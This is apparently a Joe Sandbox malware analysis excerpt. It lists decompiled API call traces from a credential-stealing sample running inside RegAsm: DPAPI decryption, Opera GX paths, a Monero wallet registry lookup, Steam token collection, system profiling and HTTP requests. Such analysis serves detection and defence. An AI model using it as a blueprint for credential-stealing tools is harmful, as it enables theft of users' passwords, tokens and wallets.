                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                      • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                      • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                    • memcmp.MSVCRT ref: 0040C21C
                                                                                      • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                      • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                      • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                    • String ID: $DPAPI
                                                                                    • API String ID: 2477620391-1819349886
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?), ref: 00410694
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000), ref: 004106B0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3676486918-2517555085
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624), ref: 0040FB6B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                                    • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: CurrentBuildNumber
                                                                                    • API String ID: 3676486918-1022791448
                                                                                    • Opcode ID: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                    • Instruction ID: 28640ec94ffd33d2c44419ba2cf0af880b9d8ee060d027bd97fbaf1b7c2936ad
                                                                                    • Opcode Fuzzy Hash: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                    • Instruction Fuzzy Hash: C9F03076240214FBFB119BD1DC0BFAE7A7DEB45B04F101069F701A50A0D7B569409B28
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409143
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425E0C,?,?,?,00425BF3,00000000), ref: 0040921D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 3423466546-0
                                                                                    • Opcode ID: bfef4180e8e3876148cd5ce538e57db1d27edee7cd8a81a86ac191b16032c8c9
                                                                                    • Instruction ID: 6a8509654029ecf25c00575de94dff416ad1a9dfa5c75539aeb624d08fba698f
                                                                                    • Opcode Fuzzy Hash: bfef4180e8e3876148cd5ce538e57db1d27edee7cd8a81a86ac191b16032c8c9
                                                                                    • Instruction Fuzzy Hash: 61B15A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6DC947
                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C6DC969
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6DC9A9
                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C6DC9C8
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C6DC9E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                    • String ID:
                                                                                    • API String ID: 4191843772-0
                                                                                    • Opcode ID: 7b10c12b150b65128b5bb758dbc7213c85ab402017290b37de05157168d9f821
                                                                                    • Instruction ID: 3106be2bbb62eecbeaa3708393ccff10b5b68346d1f23fae88d726054f81c405
                                                                                    • Opcode Fuzzy Hash: 7b10c12b150b65128b5bb758dbc7213c85ab402017290b37de05157168d9f821
                                                                                    • Instruction Fuzzy Hash: D421FF31741618BBD714BA24DC84BAE7379AB8670CF61412BF9079B680D7707C048799
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 599723951-0
                                                                                    • Opcode ID: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
                                                                                    • Instruction ID: 88ec815686b26defa928efc06cad103335915502f2ebb48a4a43328a16f3c0f2
                                                                                    • Opcode Fuzzy Hash: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
                                                                                    • Instruction Fuzzy Hash: 922109B1A00118ABCB10EFA5C955AEEFBB9AF98344F50407EE415F3291CB785A488B65
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004024F0
                                                                                      • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                    • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                      • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                    • memset.MSVCRT ref: 00402540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 3248666761-0
                                                                                    • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                    • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D70A
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID: #$Opera GX
                                                                                    • API String ID: 2625060131-1046280356
                                                                                    • Opcode ID: 8438e43411761002320f3f9de9011d9594c7e5a89b65446c504462b94cd75c98
                                                                                    • Instruction ID: 7bf8bd95af0ab130806eb85ed7196d5d1824f91eddb0a7e88fed5b384ee0e496
                                                                                    • Opcode Fuzzy Hash: 8438e43411761002320f3f9de9011d9594c7e5a89b65446c504462b94cd75c98
                                                                                    • Instruction Fuzzy Hash: 47027C7190424CEADF14EBE5D956BDEBBB8AF19308F10417EE405732C2DA781B0C8B66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041332B
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen
                                                                                    • String ID: ERROR
                                                                                    • API String ID: 2133942097-2861137601
                                                                                    • Opcode ID: e21d3304088cc9bcdfe72a3d82c06255ec2a2465ab3062463e78c3a24b0dedec
                                                                                    • Instruction ID: 1c592bd34475586d8bf3bdcea4321633edf8985e3e402502d8e97464bbd79d58
                                                                                    • Opcode Fuzzy Hash: e21d3304088cc9bcdfe72a3d82c06255ec2a2465ab3062463e78c3a24b0dedec
                                                                                    • Instruction Fuzzy Hash: 8C3152B1D00148AFDB00EFA9D956BDD7FB4AB15304F10807EF505A7292DB399648CBA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                    • String ID: ERROR$ERROR
                                                                                    • API String ID: 1120091252-2579291623
                                                                                    • Opcode ID: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                    • Instruction ID: 0083d2e72e9c4a3b74dda565e39e4a0bb24369a5d23a76fc935ba894ca840aa9
                                                                                    • Opcode Fuzzy Hash: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                    • Instruction Fuzzy Hash: 17210EB0900189EADB14FFA5C556BDDBBF4AF18308F50417EE80563682DB785B0CCB66
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                    • String ID: 2IA
                                                                                    • API String ID: 3183270410-4174278054
                                                                                    • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                    • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2678630583-0
                                                                                    • Opcode ID: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                    • Instruction ID: ec526774ace028d9da9643eeb35cca1a79bf063c44aba5694452f09cb0374c28
                                                                                    • Opcode Fuzzy Hash: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                    • Instruction Fuzzy Hash: 23310D75900148AFCB11DFA4C995ADEBBB8FF18304F50412EF906A7281DB789A88CB95
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                    • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                    • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                                    • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6%@$6%@
                                                                                    • API String ID: 0-3369382886
                                                                                    • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                    • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041453D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265B3), ref: 0041458E
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                    • API String ID: 40794102-3507145866
                                                                                    • Opcode ID: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                    • Instruction ID: 67ec4c1d792d67a99180fbd14363f38a75f30ae372fc1f04672944380735093a
                                                                                    • Opcode Fuzzy Hash: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                    • Instruction Fuzzy Hash: D8214971C00188AACB14FBE5C956BDDBB78AF18308F50817EE401725D2DB78274CCA66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004071CB
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407402
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407416
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
